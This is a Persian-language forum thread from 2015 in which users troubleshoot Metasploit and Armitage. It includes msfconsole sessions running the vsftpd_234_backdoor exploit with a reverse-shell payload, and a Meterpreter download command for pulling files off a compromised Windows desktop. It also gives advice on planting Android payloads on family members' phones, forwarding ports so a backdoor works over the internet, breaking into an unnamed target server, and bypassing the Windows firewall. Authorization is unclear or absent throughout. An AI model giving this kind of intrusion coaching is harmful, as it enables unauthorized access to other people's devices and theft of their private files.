02-10-2015, 07:39 PM
آرمیتیج به اصطلاح نسخه گرافیکی metasploit میباشد حتما شما توی کنسول metasploit زدید reboot نه توی دسترسی ای که گرفتید.

آرمیتیج یک تارگتی که به اصطلاح UP باشه رو اکسپلویت هایی رو روش تست میکنه با چک کردن این اکسپلویت ها روی تارگت به شما میگه این تارگت شما قابلیت استفاده از این اکسپلویت ها رو داره و یکی از مزیت های مهم آرمیتیج همین میباشد.

موفق باشید

--- ویرایش ---



میتونید از آموزش Use DNS on metasploit backdoor که در امضام هست استفاده کنید.

الان هم به صورت دستی خودم با متا چک کردم.
وقتی دسترسی داد زدم ریبوت ولی خودم ریبوت شدم!!!! علت چیه!!!!!!!!!!!!

Prot3ct0r
02-10-2015, 07:51 PM
الان هم به صورت دستی خودم با متا چک کردم.
وقتی دسترسی داد زدم ریبوت ولی خودم ریبوت شدم!!!! علت چیه!!!!!!!!!!!!

احتمالا شما payload ای set نکردید در payload هایی که مربوط به سیستم عامل لینوکس هست یک payload رو set کنید و بعد میتونید دسترسی بیشتری داشته باشید.

مشکلتونم عجیب هست گفتم بنده زیاد با armitage کار نکردم اما یک فایل bash بسازید و دستور Reboot 0 رو توش بگذارید سپس اجراش کنید ببینید مشکل حل میشه یا خیر یکی دیگه از راه حل هام استفاده از payload میباشد.

موفق باشید.

parsa_91
02-10-2015, 07:57 PM
احتمالا شما payload ای set نکردید در payload هایی که مربوط به سیستم عامل لینوکس هست یک payload رو set کنید و بعد میتونید دسترسی بیشتری داشته باشید.

مشکلتونم عجیب هست گفتم بنده زیاد با armitage کار نکردم اما یک فایل bash بسازید و دستور Reboot 0 رو توش بگذارید سپس اجراش کنید ببینید مشکل حل میشه یا خیر یکی دیگه از راه حل هام استفاده از payload میباشد.

موفق باشید.

به صورت دستی پی لود هم ست کردم.
حتی یه سرور دیگه رو با ارمیتج اسکن کردم . تمام مشخصاتش رو اورد.
با متا هم ست کردم. وقتی تو دسترسی که میده میزنم etc/passwd . فایل پس سیستم خودم رو نشون میده!!!! الان هم دستور ifconfig زدم مشخصات خودمو اورد!!!!!!!

یه چیزی به ذهنم میرسه اینه که من Use Dns on Metasploit Backdoor رو انجام ندادم. احتمال داره برای اون باشه؟
ای پی سرور رو بدم بهتون خودتون با این اکسپلویت vsftpd_234_backdoor تست کنید؟

Prot3ct0r
02-10-2015, 08:07 PM
به صورت دستی پی لود هم ست کردم.
حتی یه سرور دیگه رو با ارمیتج اسکن کردم . تمام مشخصاتش رو اورد.
با متا هم ست کردم. وقتی تو دسترسی که میده میزنم etc/passwd . فایل پس سیستم خودم رو نشون میده!!!! الان هم دستور ifconfig زدم مشخصات خودمو اورد!!!!!!!

یه چیزی به ذهنم میرسه اینه که من Use Dns on Metasploit Backdoor رو انجام ندادم. احتمال داره برای اون باشه؟
ای پی سرور رو بدم بهتون خودتون با این اکسپلویت vsftpd_234_backdoor تست کنید؟

ip static زمانی استفاده میشود که شما payload ای رو تحت عنوان فایل اجرایی و تحت platform ویندوز به قربانی میدید که اگر نداشته باشید بعد از عوض شدن ip اتون دسترسی اتون میپره برای همین باید از dns استفاده کنید.

برای این اکسپلویت نیازی به dns ندارید.

مشخصات سرور رو خصوصی کنید//

موفق باشید

parsa_91
02-10-2015, 08:21 PM
براتون ای پی سرور رو خصوصی میکنم . اگه میشه یه چک کنید با این پی لود. چرا پی لود روی سیستم خودم ران میشه؟

اینو نگاه کنید وقتی پی لود رو ران میکنم اینو میده.. اینجا دسترسی میده یا نه؟

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf exploit(vsftpd_234_backdoor) > set LPORT 26777
LPORT => 26777
msf exploit(vsftpd_234_backdoor) > set RHOST 10.10.10.10.
RHOST => 10.10.10.10
msf exploit(vsftpd_234_backdoor) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(vsftpd_234_backdoor) > set TARGET 0
TARGET => 0
msf exploit(vsftpd_234_backdoor) > exploit -j
Exploit running as background job.
Started reverse handler on 192.168.1.100:26777
Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 4 of 50 allowed.
220-Local time is now 16:20. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER: 331 User 0:) OK. Password required
msf exploit(vsftpd_234_backdoor) >

اگه میشه ی تارگت بهم بدین

Prot3ct0r
02-10-2015, 08:26 PM
براتون ای پی سرور رو خصوصی میکنم . اگه میشه یه چک کنید با این پی لود. چرا پی لود روی سیستم خودم ران میشه؟

اینو نگاه کنید وقتی پی لود رو ران میکنم اینو میده.. اینجا دسترسی میده یا نه؟


اگه میشه ی تارگت بهم بدین


این ویدئو رو ببینید:


[Only registered and activated users can see links]

تارگت هم بررسی میکنم وقت کردم نتیجه رو توی این تاپیک اعلام میکنم.

موفق باشید

Prot3ct0r
02-11-2015, 10:24 AM
براتون ای پی سرور رو خصوصی میکنم . اگه میشه یه چک کنید با این پی لود. چرا پی لود روی سیستم خودم ران میشه؟

اینو نگاه کنید وقتی پی لود رو ران میکنم اینو میده.. اینجا دسترسی میده یا نه؟


اگه میشه ی تارگت بهم بدین



سرویس مورد نظر آسیب پذیر نیست.



msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST ipoftarget
RHOST => ipoftarget

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST ipoftarget yes The target address
RPORT 21 yes The target port


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(vsftpd_234_backdoor) > exploit

Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 06:33. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER: 331 User pmItBV:) OK. Password required



در صورتی که اگر سرویس مورد نظر آسیب پذیر بود شما با این پیغام ورود مواجه می شدید:


Banner: 220 Welcome to Ftp Service!! Have a nice day~!! <_>

USER: 331 please specify the password.

Backdoor service has been spawned, handling ...

UID: uid=0(root) gid=0(root) groups=0(root)

Found shell.

Command shell session 1 opened (ipoftarget:1111 -> attackerip:2222) at 2015-02-11 08:34:54 +0900

در صورتی که قصد دارید این آسیب پذیری رو تست کنید میتونید نسخه آسیب پذیر این نرم افزار رو دانلود کنید و روی مجازی نصب کنید و در نهایت موفق به تست خواهید شد. توی ویدئو بالا هم همینکارو کرده است.

موفق باشید

parsa_91
02-11-2015, 11:11 AM
سپاس.
من یه تارگت دارم پورتای 25-21-80-143-110-443-2222-3306-8080 رو باز داره. هر کاری کردم نتونستم بهش نفوذ کنم. یه راه حل میگید ک بتونم بهش نفوذ کنم؟؟؟

راسیت وقتی میزنم ورژن توی متاسپلویت اینو میده:
Framework: 4.9.3-2014071601
Console : 4.9.3-2014071601.15168
نیاز به اپدیت نداره؟

Prot3ct0r
02-11-2015, 11:48 AM
سپاس.
من یه تارگت دارم پورتای 25-21-80-143-110-443-2222-3306-8080 رو باز داره. هر کاری کردم نتونستم بهش نفوذ کنم. یه راه حل میگید ک بتونم بهش نفوذ کنم؟؟؟

راسیت وقتی میزنم ورژن توی متاسپلویت اینو میده:
Framework: 4.9.3-2014071601
Console : 4.9.3-2014071601.15168
نیاز به اپدیت نداره؟

اگر وقتی اقدام به آپدیت میکنید بروزرسانی نمیشه آخرین ورژن هست .. .

تارگت شما سرور هست یا یک کاربر درون شبکه هست؟

اگر سرور هست با آسیب پذیری های web application میتونید نفوذ کنید و بنا بر آسیب پذیری های ثانویه دسترسی اتون رو افزایش بدید.

اگر کاربر باشه کارتون سخت تره که در بهترین شرایط باید یک سرویس آسیب پذیر در حال اجرا داشته باشه که میتونید با آرمیتیج تست کنید که ببینید آیا میتونید استفاده کنید یا خیر بعلاوه به سایت های اکسپلویت هم سر بزنید و آخرین اکسپلویت های remote رو مشاهده کنید.

موفق باشید.

programmer2013
02-18-2015, 07:31 PM
سلام.

ببخشید یه سوال دارم.

چجوری میشه فایروال ویندوز رو دور زد(bypass)؟؟؟

ممنون میشم راهنمایی کنید

Prot3ct0r
02-18-2015, 08:05 PM
سلام.

ببخشید یه سوال دارم.

چجوری میشه فایروال ویندوز رو دور زد(bypass)؟؟؟

ممنون میشم راهنمایی کنید

درود

بهترین روش در این زمان این هست که از اکسپلویت هایی استفاده کنید که نیاز به remote نداشته باشه تا از کارکرد فایروال جلوگیری کنید برای مثال استفاده از باگ های ie و ... البته اگر در هنگام اسکن میخواید فایروال رو bypass کنید میتونید از switch های nmap استفاده کنید

infohooman051
02-19-2015, 10:21 PM
سلام ما با متا به یه سیستم مثلا وین 8 نفوذ کردیم من تا حدی دستورات لینوکس رو بلدم
حالا دوستان
یه سوال
من مثلا وارد دسکتاپ شدم با دستور cd dekstop خوب حالا داخل دسکتاپ طرف 10 تا عکسه من می خوام عکس شماره ی 4 رو دان کنم چه طوری ؟
باید از wget استفاده کنم
میشه کامل بگید
درضمن یه سوال دیگه بهتره نیست از ارمیتیج استفاده کنم
؟

Prot3ct0r
02-20-2015, 01:45 PM
سلام ما با متا به یه سیستم مثلا وین 8 نفوذ کردیم من تا حدی دستورات لینوکس رو بلدم
حالا دوستان
یه سوال
من مثلا وارد دسکتاپ شدم با دستور cd dekstop خوب حالا داخل دسکتاپ طرف 10 تا عکسه من می خوام عکس شماره ی 4 رو دان کنم چه طوری ؟
باید از wget استفاده کنم
میشه کامل بگید
درضمن یه سوال دیگه بهتره نیست از ارمیتیج استفاده کنم
؟

درود

در صورتی که شما از Meterpreter Payload استفاده کردید میتونید با دستور download اینکار رو انجام بدید برای مثال:



meterpreter > download c:\\boot.ini

downloading: c:\boot.ini -> c:\boot.ini

downloaded : c:\boot.ini -> c:\boot.ini/boot.ini

meterpreter >

موفق باشید

infohooman051
02-21-2015, 02:51 PM
درود

در صورتی که شما از Meterpreter Payload استفاده کردید میتونید با دستور download اینکار رو انجام بدید برای مثال:



meterpreter > download c:\\boot.ini

downloading: c:\boot.ini -> c:\boot.ini

downloaded : c:\boot.ini -> c:\boot.ini/boot.ini

meterpreter >

موفق باشید

برای دانلود تو اندروید چه جوری مثلا تو ویندوز من می خوام عکس دان کنم که رو صفحه هست اینطوری میشه
cd desktop
dowmload c:\users\name\aks.jpg
خوب این که از این حالا تو اندروید باید چه طوری دانلود کنی
در ضمن یه مشکلی هم که دارم
ببین
من هم با ارمیتیج رفتم هم با متا
جفتش یه مشکلی هست این که اگه رو گوشی بزنم باز نمیشه اطلاعات ولی با شبیه ساز خیلی راحت باز میشه (تست شده روی گوشی های اعضای خانه )
گوشی ها هم هیچ انتی و... ندارن و وقتی میزنم هیچی نشون نمی ده اما با نرم افزار شبیه ساز نشون میده
و اخرین سوال
:

ارمیتیج کالی که فایل رو میریزم تو شبیه ساز و اجرا می کنم باز میشه اما دسرسی هایی که تو فیلم ها بود نداره اون گزنه های دسرسی رو نداره
متا و ارمیتیج هردو اپدیت هستند
اگه میشه کامل به سوال هام ج بدی خیلی ممنون می شم

Prot3ct0r
02-21-2015, 03:44 PM
برای دانلود تو اندروید چه جوری مثلا تو ویندوز من می خوام عکس دان کنم که رو صفحه هست اینطوری میشه
cd desktop
dowmload c:\users\name\aks.jpg
خوب این که از این حالا تو اندروید باید چه طوری دانلود کنی
در ضمن یه مشکلی هم که دارم
ببین
من هم با ارمیتیج رفتم هم با متا
جفتش یه مشکلی هست این که اگه رو گوشی بزنم باز نمیشه اطلاعات ولی با شبیه ساز خیلی راحت باز میشه (تست شده روی گوشی های اعضای خانه )
گوشی ها هم هیچ انتی و... ندارن و وقتی میزنم هیچی نشون نمی ده اما با نرم افزار شبیه ساز نشون میده
و اخرین سوال
:

ارمیتیج کالی که فایل رو میریزم تو شبیه ساز و اجرا می کنم باز میشه اما دسرسی هایی که تو فیلم ها بود نداره اون گزنه های دسرسی رو نداره
متا و ارمیتیج هردو اپدیت هستند
اگه میشه کامل به سوال هام ج بدی خیلی ممنون می شم
درود

با زدن دستور "؟" ببینید که برای دانلود چه دستوری توی Payload ای که استفاده کردید در نظر گرفته شده است .
اگر نشون نمیده نسخه گوشی شما شاید آسیب پذیر نیست؟ شما از چه روشی استفاده میکنید؟ آرمیتیج رو بهش توجه ای نکنید! شما از دور میخواید گوشی رو بهش نفوذ کنید یا با استفاده از دادن Payload در قالب بسته نصبی به گوشی؟

در صورتی که از دور میخواید نفوذ کنید باید حتما سرویس آسیب پذیری روی گوشی در حال اجرا باشه و یک سری از شرایط دیگه ام داره بیشتر توضیح بدید.

در صورتی که دسترسی هاتون کامل نیست میتونه هر علتی داشته باشه ! شاید اکسپلویت به درستی کار نکرده شاید شما Payload رو به درستی انتخاب نکردید و ... ! برای Payload به شما پیشنهاد میکنم از Payload هـ Meterpreter نسخه Android استفاده کنید تا دسترسی های بیشتری داشته باشید.

درباره اون هم بگم که بهتر هست گوشی و شما تحت یک Access point با هم دیگه شبکه محلی تشکیل بدید تا یک سری از محدودیت ها برداشته بشه و بتونید کامل تست کنید. در صورتی که گوشی به اینترنت وصل هست و شما هم به یک اینترنت از یک ISP دیگه ممکن هست به علت عدم Valid بودن آی پی شما ، فایروال و ... دسترسی برای شما ایجاد نشه ..
برای اینکه بهتر بتونیم راهنماییتون کنیم بهتر هست تا کمی کامل تر شرایط محیط آزمایشی ای که درست کردید رو شرح بدید.
موفق باشید

zoko0297
02-21-2015, 04:52 PM
با سلام خدمت دوستان عزیز
دوستان من آرمیتیج و متاایسپلویت رو نصب کردم اما نمیتونم آرمیتیج رو به متااسپلویت وصل کنم ومشکلات زیر رو دارم (تصاویر پیوست میشن)
چرا وقتی آرمیتیج رو باز میکنم و Connect میزنم این پیغام برام نمایش داده میشه؟!؟
چرا تو بعضی از فیلم های اموزشی دیدم که ارمیتیجی که دوستان نصب میکنن یه گزینه داره به اسم
Start msf اما مال من نداره؟
چرا تو Error ی که میاد میگه ویندوز شما ساپورت نمیشه و احتمالا لینوکس میخواد؟!
در ضمن باید بگم که من هم متاسپلویت رو نصب کردم هم جاوا نصب کردم
و هم آرمیتیج رو از سایت اصلیش برای نسخه ی ویندوز دانلود کردم
در ضمن ویندوز من سون 64 بیت هست آیا آرمیتیج روی این ویندوز جواب میده یا اصلا روی ویندوز
سون جواب میده اگه جواب میده 32 یا 64 بودنش تفاوتی داره؟
دوستان ممنون میشم یه جواب جامع و کامل بهم بدید.
122830
یه عکس هم از محیط نصب برنامه میذارم بببینید چیزی از قلم نیوفتاده باش
122831

Prot3ct0r
02-21-2015, 05:42 PM
با سلام خدمت دوستان عزیز
دوستان من آرمیتیج و متاایسپلویت رو نصب کردم اما نمیتونم آرمیتیج رو به متااسپلویت وصل کنم ومشکلات زیر رو دارم (تصاویر پیوست میشن)
چرا وقتی آرمیتیج رو باز میکنم و Connect میزنم این پیغام برام نمایش داده میشه؟!؟
چرا تو بعضی از فیلم های اموزشی دیدم که ارمیتیجی که دوستان نصب میکنن یه گزینه داره به اسم
Start msf اما مال من نداره؟
چرا تو Error ی که میاد میگه ویندوز شما ساپورت نمیشه و احتمالا لینوکس میخواد؟!
در ضمن باید بگم که من هم متاسپلویت رو نصب کردم هم جاوا نصب کردم
و هم آرمیتیج رو از سایت اصلیش برای نسخه ی ویندوز دانلود کردم
در ضمن ویندوز من سون 64 بیت هست آیا آرمیتیج روی این ویندوز جواب میده یا اصلا روی ویندوز
سون جواب میده اگه جواب میده 32 یا 64 بودنش تفاوتی داره؟
دوستان ممنون میشم یه جواب جامع و کامل بهم بدید.
122830
یه عکس هم از محیط نصب برنامه میذارم بببینید چیزی از قلم نیوفتاده باش
122831
درود

برای حل ارور اول این ویدئو رو ببینید تا متوجه بشوید :

[Only registered and activated users can see links]

درباره Start Smf هم شما از ورژن جدید Armitage استفاده میکنید و این دکمه مربوط به ورژن های گذشته Armitage میباشد.

موفق باشید

infohooman051
02-21-2015, 07:32 PM
سلام
من زیاد نفهمیدم
ولی پیلود رو درست انتخاب کردم و از همین سایت بوده
و می دونم درسته این یک
و بگم یعنی شما میگید مثلا چون به یه نت وصل هستیم نمیشه تست کرد ؟
مثلا چون به وایلرس وصله گوشی جواب نمیده
از متا هم استفاده می کنم
اول
msfpayload ,...
بعد هم میام
msf
رو میارم
و میزنم
use multi/handler
و بقیه داستان
اما فقط روی شبیه ساز جواب میده
مشکل کجاست
؟

zoko0297
02-21-2015, 09:52 PM
درود

برای حل ارور اول این ویدئو رو ببینید تا متوجه بشوید :

[Only registered and activated users can see links]

درباره Start Smf هم شما از ورژن جدید Armitage استفاده میکنید و این دکمه مربوط به ورژن های گذشته Armitage میباشد.

موفق باشید

دوست عزیز اولا ممنون که زود جوابمو دادی و
دوم این که من الان یه مشکل دیگه دارم و اونم اینه که کنسول رو که باز میکنم سریع نمایش داده میشه
و تصویر میره حتی یه بار پاک کردم دوباره نصب کردم حل نشد میشه در این مورد هم راهنمایی بفرمایید
آها داشت یادم میرم تو فیلمایی که من دیدم خود آرمیتیج همراه بامتااسپلویت نصب میشه حتی تو یکی از همین فروم های آشیانه هم همچین چیزی خوندم اما نمیدونم چرا متایی که من نصب میکنم نداره با اینکه آخرین ورژنش رو از سایت اصلیش گرفتم

Prot3ct0r
02-21-2015, 10:08 PM
سلام
من زیاد نفهمیدم
ولی پیلود رو درست انتخاب کردم و از همین سایت بوده
و می دونم درسته این یک
و بگم یعنی شما میگید مثلا چون به یه نت وصل هستیم نمیشه تست کرد ؟
مثلا چون به وایلرس وصله گوشی جواب نمیده
از متا هم استفاده می کنم
اول
msfpayload ,...
بعد هم میام
msf
رو میارم
و میزنم
use multi/handler
و بقیه داستان
اما فقط روی شبیه ساز جواب میده
مشکل کجاست
؟
درود

نگاه کنید من گفتم اطلاعات بیشتری قرار بدید برای مثال دستوراتی که زدید و همین شبیه سازی که میگید روش مشکلی نداره چه شبیه سازی هست.
منظور بنده ام این هست که برای مثال به یه شبکه وایرلس وصل شید و آی پی V4 هر دستگاه درون شبکه رو انتخاب کنید برای مثال آی پی V4 کالی یک طرف و مال اون گوشی یک طرف دیگه ( کالی یا باید Live بوت شده باشه یا کارت شبکه جدا گرفته باشید براش برای اینکار ) با اینکار یه شبیه سازی کامل میتونید انجام بدید در محیط واقعی اما اگر در محیط اینترنت و بستر اینترنت بخواید اینکار رو انجام بدید مهمتر از همه بحث Valid بودن آی پی مورد بحث هست و موارد دیگه که برای جلوگیری از گیج شدن شما واردش نمیشیم.
اگر بتونید با تصویر مشکلتون رو توضیح بدید بهتر میتونیم راهنماییتون کنیم.



دوست عزیز اولا ممنون که زود جوابمو دادی و
دوم این که من الان یه مشکل دیگه دارم و اونم اینه که کنسول رو که باز میکنم سریع نمایش داده میشه
و تصویر میره حتی یه بار پاک کردم دوباره نصب کردم حل نشد میشه در این مورد هم راهنمایی بفرمایید
آها داشت یادم میرم تو فیلمایی که من دیدم خود آرمیتیج همراه بامتااسپلویت نصب میشه حتی تو یکی از همین فروم های آشیانه هم همچین چیزی خوندم اما نمیدونم چرا متایی که من نصب میکنم نداره با اینکه آخرین ورژنش رو از سایت اصلیش گرفتم

درود

متاسفانه مشکلتون رو درک نکردم از اینکه سریع باز میشه؟
کلا توی ویندوز مشکلات زیادی هست اگر بتونید از کالی لینوکس برای این کار استفاده کنید بهتر هست روی کالی به صورت پیشفرض آریمتیج و متاسپلویت و تمامی قسمت های مختلف مورد نیاز شما نصب هست ..

اما با این حال بهتر هست که برای مشکلاتتون و نصبتون جای فیلم ها که همیشه اشتباهاتی توشون مشاهده شده از راهنمایی سایت سازنده استفاده کنید:

[Only registered and activated users can see links]

موفق باشید

infohooman051
02-22-2015, 11:41 AM
درود

نگاه کنید من گفتم اطلاعات بیشتری قرار بدید برای مثال دستوراتی که زدید و همین شبیه سازی که میگید روش مشکلی نداره چه شبیه سازی هست.
منظور بنده ام این هست که برای مثال به یه شبکه وایرلس وصل شید و آی پی V4 هر دستگاه درون شبکه رو انتخاب کنید برای مثال آی پی V4 کالی یک طرف و مال اون گوشی یک طرف دیگه ( کالی یا باید Live بوت شده باشه یا کارت شبکه جدا گرفته باشید براش برای اینکار ) با اینکار یه شبیه سازی کامل میتونید انجام بدید در محیط واقعی اما اگر در محیط اینترنت و بستر اینترنت بخواید اینکار رو انجام بدید مهمتر از همه بحث Valid بودن آی پی مورد بحث هست و موارد دیگه که برای جلوگیری از گیج شدن شما واردش نمیشیم.
اگر بتونید با تصویر مشکلتون رو توضیح بدید بهتر میتونیم راهنماییتون کنیم.




درود

متاسفانه مشکلتون رو درک نکردم از اینکه سریع باز میشه؟
کلا توی ویندوز مشکلات زیادی هست اگر بتونید از کالی لینوکس برای این کار استفاده کنید بهتر هست روی کالی به صورت پیشفرض آریمتیج و متاسپلویت و تمامی قسمت های مختلف مورد نیاز شما نصب هست ..

اما با این حال بهتر هست که برای مشکلاتتون و نصبتون جای فیلم ها که همیشه اشتباهاتی توشون مشاهده شده از راهنمایی سایت سازنده استفاده کنید:

[Only registered and activated users can see links]

موفق باشید




اره من گیج میشم و بحث ای پی ولید و غیر ولید هم خیلی کلا هیچی ازش نمی فهمم
الان من اینطوری بگم یه کارت شبکه دارم
و ای پی لینوکسیم بیشتر یه ای پی بوده و فکر کنم بیشتر وقت ها ثابته
نتتم از شاتل هست
الان من می تونم با همون فیلم هایی که دیدم مثلا فایل رو برای دوستم بفرستم که نتش مثلا مال یه جای دیگس و دسرسی بگیرم
؟
شبیه ساز هم منوظرم نرم افزار BlueStacksکه فقط روی اون جواب میده
روی بقیه جواب نمی ده

Prot3ct0r
02-22-2015, 02:27 PM
اره من گیج میشم و بحث ای پی ولید و غیر ولید هم خیلی کلا هیچی ازش نمی فهمم
الان من اینطوری بگم یه کارت شبکه دارم
و ای پی لینوکسیم بیشتر یه ای پی بوده و فکر کنم بیشتر وقت ها ثابته
نتتم از شاتل هست
الان من می تونم با همون فیلم هایی که دیدم مثلا فایل رو برای دوستم بفرستم که نتش مثلا مال یه جای دیگس و دسرسی بگیرم
؟
شبیه ساز هم منوظرم نرم افزار BlueStacksکه فقط روی اون جواب میده
روی بقیه جواب نمی ده

درود

همونطوری که پیش اشاره کردم یا کالی و لینوکستون رو به صورت LIVE بوت کنید و این شبیه سازی رو انجام بدید که برای اینکار باید هم گوشی و هم کالی شما به یک شبکه متصل باشند که برای شبکه کردن اونا اگر مودم اتون Wireless هست هر 2 رو به یک AP وصل کنید و یک اگر هم معمولی هست در صورتی که بتونید با تبدیل ها اینکارو انجام بدید باید به هم دیگه شبکه کنید و اینکار رو انجام بدید.

مورد دوم این هست که میخواید در بستر اینترنت اینکارو انجام بدید برای اینکار علاوه بر Live بوت کردن کالی باید پورت مربوط به بکدور رو هم روی سیستمتون باز کنید و FORWARD کنید و موارد دیگه ، برای شبکه کردن هم ادامه سوالاتون رو توی تاپیک مربوطه بپرسید تا راهنمایی کنند.

پ.ن: وقتی روی نرم افزار BlueStacks کار میکنه یعنی مشکلی نداره و ایراد از همون بحث ip و شبکه هست.

موفق باشید

zoko0297
02-22-2015, 07:24 PM
درود

متاسفانه مشکلتون رو درک نکردم از اینکه سریع باز میشه؟
کلا توی ویندوز مشکلات زیادی هست اگر بتونید از کالی لینوکس برای این کار استفاده کنید بهتر هست روی کالی به صورت پیشفرض آریمتیج و متاسپلویت و تمامی قسمت های مختلف مورد نیاز شما نصب هست ..

اما با این حال بهتر هست که برای مشکلاتتون و نصبتون جای فیلم ها که همیشه اشتباهاتی توشون مشاهده شده از راهنمایی سایت سازنده استفاده کنید:

[Only registered and activated users can see links]

موفق باشید[/QUOTE]

دوست عزیز من به گفته ی شما عمل کردم و کالی رو نصب کردم و موفق شدم آرمیتیج رو اجرا کنم
حالا یه سوال دیگه دارم من هر دفعه باید این مسیر رو طی کنم
Application -> Kali Linux -> System Service -> Metasploit
و کامند متا رو باز کنم و دستور آرمیتیج (armitage) رو بنویسم
و آرمیتیج اجرا بشسه و هر دفعه هم باید تا متصل شدن به متاسپلویت صبر کنم
آیا راهی هست که من مثلا مثل ویندوز بتونم یه Shurtcut از
آرمیتیج بسازم و هر وقت خواستم بازش کنم و دیگه نخوام هر دفعه صبر کنم تا آرمیتیج به مت وصل بشه
یعنی نمیسشه یه بار وصل بشه به متا و دفعه ی بعد دیگه مراحل قبل طی نشه؟!؟
امیدوارم منظورم رو خوب رسونده باشم
با تشکر

Prot3ct0r
02-22-2015, 08:30 PM
دوست عزیز من به گفته ی شما عمل کردم و کالی رو نصب کردم و موفق شدم آرمیتیج رو اجرا کنم
حالا یه سوال دیگه دارم من هر دفعه باید این مسیر رو طی کنم
Application -> Kali Linux -> System Service -> Metasploit
و کامند متا رو باز کنم و دستور آرمیتیج (armitage) رو بنویسم
و آرمیتیج اجرا بشسه و هر دفعه هم باید تا متصل شدن به متاسپلویت صبر کنم
آیا راهی هست که من مثلا مثل ویندوز بتونم یه Shurtcut از
آرمیتیج بسازم و هر وقت خواستم بازش کنم و دیگه نخوام هر دفعه صبر کنم تا آرمیتیج به مت وصل بشه
یعنی نمیسشه یه بار وصل بشه به متا و دفعه ی بعد دیگه مراحل قبل طی نشه؟!؟
امیدوارم منظورم رو خوب رسونده باشم
با تشکر


عزیزم شما توی Terminal اگر دستور Armitage رو بزنید مستقیم میتونید وارد بشید ؛ نیازی به باز کردن متاسپلویت نیست

infohooman051
02-22-2015, 09:36 PM
درود

همونطوری که پیش اشاره کردم یا کالی و لینوکستون رو به صورت LIVE بوت کنید و این شبیه سازی رو انجام بدید که برای اینکار باید هم گوشی و هم کالی شما به یک شبکه متصل باشند که برای شبکه کردن اونا اگر مودم اتون Wireless هست هر 2 رو به یک AP وصل کنید و یک اگر هم معمولی هست در صورتی که بتونید با تبدیل ها اینکارو انجام بدید باید به هم دیگه شبکه کنید و اینکار رو انجام بدید.

مورد دوم این هست که میخواید در بستر اینترنت اینکارو انجام بدید برای اینکار علاوه بر Live بوت کردن کالی باید پورت مربوط به بکدور رو هم روی سیستمتون باز کنید و FORWARD کنید و موارد دیگه ، برای شبکه کردن هم ادامه سوالاتون رو توی تاپیک مربوطه بپرسید تا راهنمایی کنند.

پ.ن: وقتی روی نرم افزار BlueStacks کار میکنه یعنی مشکلی نداره و ایراد از همون بحث ip و شبکه هست.

موفق باشید
یعنی دمت گرم خیلی خوبی
خوب رو نرم افزار bule که کار می کنه پس مشکل اصلی می تونیم بگیم پورت باز نکردم دیگه
پورت رو باید با ای پی کالی باز کنم یا با ای پی سیستم ویندوز 8 خودم ؟
غیر از پورت چی می تونه باشه ؟

Prot3ct0r
02-22-2015, 10:23 PM
یعنی دمت گرم خیلی خوبی
خوب رو نرم افزار bule که کار می کنه پس مشکل اصلی می تونیم بگیم پورت باز نکردم دیگه
پورت رو باید با ای پی کالی باز کنم یا با ای پی سیستم ویندوز 8 خودم ؟
غیر از پورت چی می تونه باشه ؟

heart عزیزم بهتون گفتم باید یا کارت شبکه اتون جدا باشه که اگر جدا باشه باید بر اساس آی پی محلی سیستم عامل کالی لینوکس port forwarding رو انجام بدید.

علت احتمالا همون پورت و فایروال هست ؛ متداول ترین مشکل همین مشکل هست.

همونطوری که بهتون گفتم شبیه سازی به این صورت خیلی مشکل هست به همین علت بهتر هست شبیه سازی روی همون BlueStacks انجام بدید. مطمئن باشید وقتی روی اونکار میکنه روی اصلی هم کار میکنه.

infohooman051
02-22-2015, 11:08 PM
heart عزیزم بهتون گفتم باید یا کارت شبکه اتون جدا باشه که اگر جدا باشه باید بر اساس آی پی محلی سیستم عامل کالی لینوکس port forwarding رو انجام بدید.

علت احتمالا همون پورت و فایروال هست ؛ متداول ترین مشکل همین مشکل هست.

همونطوری که بهتون گفتم شبیه سازی به این صورت خیلی مشکل هست به همین علت بهتر هست شبیه سازی روی همون BlueStacks انجام بدید. مطمئن باشید وقتی روی اونکار میکنه روی اصلی هم کار میکنه.

ببین من الان کارت وایلرس دارم از این هایی که به پشت می خوره حالت یو اس بی
حالا باید پورتی که می خوام تو مودم باز کنم (تو وین 8) با ای پی لینوکسی باشه یا با ای پی وین هشت
/

Prot3ct0r
02-23-2015, 02:26 PM
ببین من الان کارت وایلرس دارم از این هایی که به پشت می خوره حالت یو اس بی
حالا باید پورتی که می خوام تو مودم باز کنم (تو وین 8) با ای پی لینوکسی باشه یا با ای پی وین هشت
/
درود

شما کارت شبکه جدیدتون رو به ماشین مجازی اتون متصل کنید و سپس وارد مودم بشید و عملیات پورت فرواردینگ رو بنا بر مشخصات ماشین مجازی انجام بدید ؛ دقت داشته باشید که فایروال پیشفرض iptables میباشد که شما باید پورت مورد نظر رو در داخل اون نیز باز کنید.


موفق باشید

Mary4m
03-01-2015, 08:47 PM
با سلام
یه سوال داشتم اونم اینکه واسه نفوذ به ویندوز7 اکسپلوئیتی هست که بدون نیاز به لینک اجرایی توسط قربانی در کامپیوترش اجرا بشه مثل پورت smb که بدون نیاز به اجرای لینک اکسپلوئیت در ie دسترسی به سیستم قربانی رو میده.
اگه هست ممنون میشم بگین...

sepeher17
03-01-2015, 08:49 PM
درود
